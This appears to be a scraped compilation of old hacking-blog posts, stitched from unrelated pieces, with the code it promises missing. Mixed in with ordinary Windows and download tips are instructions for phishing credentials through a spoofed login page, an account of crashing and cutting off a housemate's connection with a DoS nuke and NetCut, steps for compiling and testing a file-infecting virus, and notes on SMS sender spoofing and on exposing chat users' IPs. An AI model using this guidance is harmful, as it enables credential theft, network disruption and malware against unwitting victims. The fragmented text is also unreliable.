There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the victim will enter http://www.mytarget.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.mytarget.com. You need to have a small script set up so it will autocratically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the victim doenst give it a second thought and will simply try again later.

Few days ago while I was surfing the Internet and I stumble on an interesting tool. It’s not something that’s really great but it’s very innovative. Someone actually created a tool called TweetMyPC that allows you to shutdown, restart or logoff a Windows computer from Twitter. I’ve really tried to use Twitter but I do have an account. The only thing I knew about Twitter is it is an online service that lets you write a short notice on what you’re currently doing and etc… If you have followers, then they can get to know what you’ve been up to via the updates you post on Twitter.

TweetMyPC is very easy to set up and I believe ANYONE can do it. If you already normally use LogMeIn or any other similar remote access program, you can still use TweetMyPC as a backup in case the primary remote access tool stopped working or not accepting your connection, you can reboot your computer using your mobile phone and hopefully the program will recover.

To get TweetMyPC working, you must first sign up for a free Twitter account. Just go to twitter.com and click the Get Start – Join button. If you already have an account, then download the latest version of TweetMyPC from the link located at the end of this article and install. Run the program and you’ll have to enter your Twitter login information (username and password). Check the Start Automatically with Windows if you want TweetMyPC To auto run on Windows startup. Click the Save and Close button. Now TweetMyPC will start checking for new tweets every 1 minute. It will only recognize commands such as Shutdown, Restart and Logoff.

Any time you want to shutdown, restart or logoff your computer, simply post an update on Twitter with the message “Shutdown” for shutting down your computer, “Restart” for restarting your computer and “Logoff” for logging off your current logged in user.

You must be thinking why would you want to use TweetMyPC to control your computer since there are even more powerful remote access software such as LogMeIn? Well sometimes we only need something that is simple and not too complicated. We all use file hosts like Rapidshare and Megaupload these days. Most of the data hosted on these file hosts are in various parts. Sometimes, due to illegal activity of the hosted files or due to no download for a long time, these files get automatically deleted from the servers. Thus, it becomes very annoying when you have downloaded most of the files and come to find that one of the file links is either dead or blocked by Rapidshare due to possible illegal contents in the file(s).

That is when link checkers come in handy. Rapidshare provides free link checking facility called Rapidshare Checker at their homepage. It is, therefore, advisable to check the integrity of the links before starting to download files from the file hosts. But, it is cumbersome to check the links every time on their homepage. Today, I’m going to show you a method (for Firefox users only) on how to automatically let Firefox check the integrity of links of various file hosts while you visit the page with download links.

Method 1
1. Download Greasemonkey add-on and install it in your Firefox.

2. Download Rapidshare Links Checker User Script from here and install the User script using GreaseMonkey.

3. Restart Firefox

Now, whenever you go to a webpage that contains Rapidshare, Megaupload, Filefactory, etc links, this User Script will come into play. If it finds dead links, it’ll have an X icon at the end of the link and a checkmark icon for a valid working link.

Most people already most likely know that Blogspot is a very good place for budding bloggers to start blogging for free. Blogger, originally created by Pyra Labs in 2001, was bought over by Google in 2003. It also owns all subdomains of blogspot.com.

Before aspiring bloggers begin using Blogger, they are required to first read and agree to the Blogger Terms of Service (”Terms of Service”) and the terms and conditions and policies, including any future amendments (collectively, the “Agreement”). Nonetheless, in actual reality, no one really reads the TOS before signing up for anything, much less a free blog service. Since, as mentioned, Blogger is a free service, users are able to freely communicate, express themselves and entitled to freedom of speech, or so it seems. There are certain rules that bloggers have to follow per se the requirements of Blogger.

Blogger has a Content Policy where certain elements published which are considered detrimental towards the browsing experience of users are flagged as offensive, hence forcing an interstitial page that says “Some readers of this blog have contacted Google because they believe this blog’s content is objectionable. In general, Google does not review nor do we endorse the content of this or any blog. For more information about our content policies, please visit the Blogger Terms of Service” before allowing viewers to access the main site.
This has indeed it’s pros and cons which is highly debatable. More notably, sites featuring pornography and obscenity are often victims of such. Among the criteria for a blog to trigger such action is the posting of the following elements that is listed in the Blogger’s Content Policy. Some might say that the introduction of such a page may stop search engines from indexing their site, thus crippling web traffic, which is rather harsh and unfair. But, bloggers must be held responsible for whatever they post.

While browsing for userscripts, I discovered a Javascript that allows you to bypass the ‘Blogger; Content Warning” page automatically. For this tutorial, I’ll be using Firefox, and notably Greasemonkey.

If you haven’t already installed Greasemonkey, you should first install it. For the benefit of others, Greasemonkey is a Firefox addon which allows users to install scripts to dramatically increase one’s browsing experience. On the Userscripts forum, members Michael Devore and groovyskies have both contributed to writing a simple script which bypasses the “Blogger: Content Warning” page.

Note that if you have NoScript installed prior to that, you’ve to allow scripts globally beforehand to make this work as this is basically a script. Wordpress 2.8.3 Admin Reset Exploit

Ah it’s Wordpress again, sometimes I wonder how many holes there are in Wordpress. I guess a dedicated attacker could find some serious ones with the complexity of the code base.

It’s suspected some of the recent high profile breaches have come from Wordpress exploits.

The latest one to become public is a simple but effective flaw, it doesn’t enable take-over but it does allow a prankster to lock an admin out of their blog by resetting the password.

Developers of the widely used WordPress blogging software have released an update that fixes a vulnerability that let attackers take over accounts by resetting the administrator password.

The bug in version 2.8.3 is trivial to exploit remotely using nothing more than a web browser and a specially manipulated link. Typically, requests to reset a password are handled using a registered email address. Using the special URL, the old password is removed and a new one generated in its place with no confirmation required, according to this alert published on the Full-Disclosure mailing list.

The flaw lurks in some of the PHP code that fails to properly scrutinize user input when the password reset feature is invoked. Exploiting it is as easy is directing a web browser to a link that looks something like:

I actually saw the alert as it was published on Full-Disclosure, obviously anything to do with Wordpress catches my attention.

The exploit can be executed by running the following code on a Wordpress 2.8.3 blog:

Simple but effective.

According to WordPress documentation here, the bug has been fixed by changing a single line of code so the program checks to make sure the input supplied for the new password isn’t an array. If it is, the user gets an error message and must try again.

That would appear to be the end of it, but security researchers Rafal Los and Mike Bailey wonder aloud here whether it would have made more sense to check instead whether the input is a string.

“Hasty coding?” he asks. “Why take the blacklist vs. whitelist approach?”

The bigger point he and other observers seem to make is that PHP is the coding equivalent of an everyman’s jet pack. It allows him to quickly soar into the sky with a minimal amount of training but doesn’t necessarily provide the means to check for buildings, planes or other hazards that may greet the user once he gets there.

Wordpress 2.8.4 has already been released so if you’re running Wordpress do update ASAP to ensure you are safe from this bug.

With the core updates now available on auto-update there’s no excuse for not updating (no more download, extract, upload via FTP).

Of course with its history, this doesn’t mean you are safe from any of the other exploits that haven’t been made public.

5. When, he will login with this Gmail phisher to his Gmail account, a new file “passwords.txt” will be created which will contain Gmail hacked password in plain text form.

Kill Anyones Internet Connection In Your Network

I believe a lot of us gone through the college life where we had to share Internet connection to cut down the expenditure in paying bills. Sharing the Internet is very easy as long as you have a router. I went through that many years ago when I was renting a room and shared the Internet with a few housemates. Most of them were an OK user because they only surf the web and play local computer games. But there’s one person, a college IT lecturer always leaves his computer turned on and download lots of stuff using LimeWire. That totally slows down my Internet connection and I find it very hard to access some websites. After telling him nicely not to do that or at least configure his P2P application not to download and upload so aggressively, he still hogs the Internet connection.

That time there was a Denial of Service for Windows XP which can reboot the computer or cause a blue screen of death by simply entering the IP address and clicking a button. I had to use that to make his computer unresponsive so that me and other housemates could use the Internet. Of course he didn’t knew about it and thought that it was his computer’s hardware problem. No doubt that it is unethical but sometimes we’re forced to do that when we’re faced with another person who is inconsiderate after telling him nicely not to do that. Don’t ask me for the XP nuker because it no longer works after XP SP1 and obviously doesn’t work with Vista and Windows 7. Recently I discovered another tool which can actually cut the connection of a computer in LAN.

I was watching a hacking video tutorial at milw0rm and found a tool called NetCut. It is a very old tool and most probably some of you might have heard about it. Basically NetCut is a tool that helps you admin your network by purely on ARP protocol. It can list IP-MAC table in seconds, turn on and off network on any computer on your LAN including any device like router and switch. Also, NetCut can protect user from ARP SPOOF attack.

I have a total of 3 computers at home and I turned them all on. Then I launched NetCut, within seconds it was able to find and list all 3 computers plus router in the program. I selected one of my computer running XP and click the “Cut Off” button. Amazingly the other computer that has been cut off couldn’t access any websites or even a shared folder on a computer in LAN. Tested on Vista and got the same results. I can’t even know what happened to the computer if someone was cutting me off using NetCut. I’d suspect that something was wrong with my network card since I couldn’t even access a shared folder in a LAN.

I am just merely sharing with you that there is something out there thats capable of disrupting your Internet connection without you knowing it. I am NOT encouraging you to go cutting off everyone’s line because you can be caught for using NetCut and probably lose friends or your job. The latest version of netCut is 2.0.8 and you cannot find the download link at the official website arcai.com. It is dangerous to download netCut from other sources because they might have been tampered with trojans or virus.

How to find PUK code of your SIM Card (Phone Number)

Few people use PIN locking system to lock their phone to avoid un-authorised access. Though this is a good option, it pisses you off sometime. Three wrong entry of PIN code will result in SIM blocking. Once SIM gets blocked, phone starts asking PUK code to enter. If you again enter wrong code for three times, SIM gets completely blocked. You have to walk into your service provider outlet to get a replacement SIM card.

PUK code is a SIM specific code assigned by your service provider. No way you can guess & enter it. So, when it asks for the PUK code, don’t do anything, get the PUK code from your service provider. Airtel has a easier way of getting PUK code. For getting PUK code of a Airtel number, send PUKPhoneNumber to toll free number 121. You can make use of any other Airtel number to send this message since your SIM might have been blocked already.

If the above method doesn’t works or your service provider is not Airtel, call to customer care using any other mobile phone which uses the same service provider. They will ask some details about you to make sure you are the owner of the SIM card. Questions might include your billing address, email ID, numbers you recently called or messaged etc. They might even ask you number printed on the SIM card, so be prepared with all details before calling them. Once you get the PUK code, enter it into the phone & your phone will return to normal.

Windows 7/Vista: Compressed File Option Missing From Send Menu

I had a problem with Windows 7 where the Compressed File option was missing from the Send menu. Luckily I knew how to bring it back. This will work for Windows Vista also.

1. Hold down the Windows Key and press R or go to Start > Run.

2. Type regsvr32 %windir%/system32/zipfldr.dll

3. Click OK.

See if the Compress Folder option is back. If not you may have to perform these steps.

1. Open Notepad.

2. Click File > Save As…

3. Name the file Compressed (zipped) Folder.ZFSendToTarget and Save it.

Recently, from almost a month SMSs from Banks, Service Providers, Companies have started prefixing something like ID, AT, VK…etc. What’s all this after all!!? Here I am to explain you what it is! Normally these SMSs originates from a Bulk SMS provider where you can use 11 digit Alpha-Numeric characters as “Sender”. But there were some security risks in this method. I was able to give a phone number as “Sender” & it appears as that person at the recipient end. Basically there was a chance to send SMSs as a different person! I was actually using this to fool my friends.

But the new TRAI regulation insisted bulk SMS providers to restrict the “Sender ID” to 8 characters. Other three characters should be used to specify who is the service provider & where it’s originated from. Say for example: HDFCBANK sends an SMS to you using bulk SMS provider located at Tamil Nadu which uses Airtel. You will receive it as AT-HDFCBANK. First character specifies which service provider the message is being originated & the second character specifies from which location it’s originated. Here is the table which has details of these SMS codes:

A Virus Program To Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.

This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking.

Testing

1. To test, run the compiled module. It will block the sites that is listed in the source code.

2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

3. To remove the virus type the following the Run.

Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between the web client and the web server. Most of us are familiar with many sites such as Gmail, Yahoo etc. using https protocol in their login pages. When we see this, we may wonder what’s the difference between http and https. In simple words HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a SECURE communication.

What exactly is Secure Communication ?

Suppose there exists two communication parties A (client) and B (server).

Working of HTTP

When A sends a message to B, the message is sent as a plain text in an unencrypted manner. This is acceptable in normal situations where the messages exchanged are not confidential. But imagine a situation where A sends a PASSWORD to B. In this case, the password is also sent as a plain text. This has a serious security problem because, if an intruder (hacker) can gain unauthorised access to the ongoing communication between A and B , he can see the PASSWORDS since they remain unencrypted. This scenario is illustrated using the following figure

Now lets see the working of HTTPS

When A sends a PASSWORD (say “mypass“) to B, the message is sent in an encrypted format. The encrypted message is decrypted on B’s side. So even if the Hacker gains an unauthorised access to the ongoing communication between A and B he gets only the encrypted password (”xz54p6kd“) and not the original password. This is shown below

HTTPS is implemented using Secure Sockets Layer (SSL).A website can implement HTTPS by purchasing an SSL Certificate. Secure Sockets Layer (SSL) technology protects a Web site and makes it easy for the Web site visitors to trust it. It has the following uses

An SSL Certificate enables encryption of sensitive information during online transactions.
Each SSL Certificate contains unique, authenticated information about the certificate owner.
A Certificate Authority verifies the identity of the certificate owner when it is issued.

How Encryption Works ?

Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a Public key to the browser to perform the encryption. The public key is made available to every one but the private key(used for decryption) is kept secret. So during a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the Private key(Secret key).

How to identify a Secure Connection ?

In Internet Explorer, you will see a lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar.You can click the lock to view the identity of the website.

In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.

So the bottom line is, whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you have a secure communication. A secure communication is a must in these situations.Otherwise there are chances of Phishing using a Fake login Page.

COMPILING METHOD:

BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4.All the infected files will be ready to reinfect

Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uplo— the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
b) Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remeber i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets —-yse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances.I will explain only for files here which lies same for Video or audio

Re-Enable Run, Task Manager, Regedit, CMD, Folder Options and System Restore IN Windows 7

This tool help us re-enable disabled Task Manager, Registry Editor, Command Prompt, Folder Options and even System Restore configuration that is normally caused by virus. Honestly the tool that I’ve been using to do this is Remove Restriction Tool v1.03 but now the latest version of RRT has grown so much that I’d say it’s a little too bloated. I just needed a simple tool that does the job and doesn’t have all those flashy interface that sometimes I can’t run on a virus infected computer.

As you can see at the screenshot below, it’s a no brainer to use this tool. All you need to do is put a check on the checkbox that you want to enable and click the Enable button. The disable feature will be instantly enabled or if not, a reboot would do the trick. Please make sure that the computer is free from virus or else the changes made by this tool will not be effective and there is no end to enabling/disabling competition between you and the virus.

Re-enable is coded in .NET but doesn’t need .NET installed because .NET dependencies are included in the program making it fully portable. That is why a single file is in 36.7MB. However if you working on a computer that already have .NET framework installed, then you can just use the 64KB version instead.

This product was last tested in the Softpedia Labs on 1st of September 2009 by Cosmin Anton and they guarantee that Re-Enable Portable 1.0.0.0 is 100% Clean, which means it does not contain any form of malware, including but not limited to: spyware, viruses, trojans and backdoors. Re-Enable is only in version 1 and I am sure that it can be improved with a couple more features without making it too bloated.
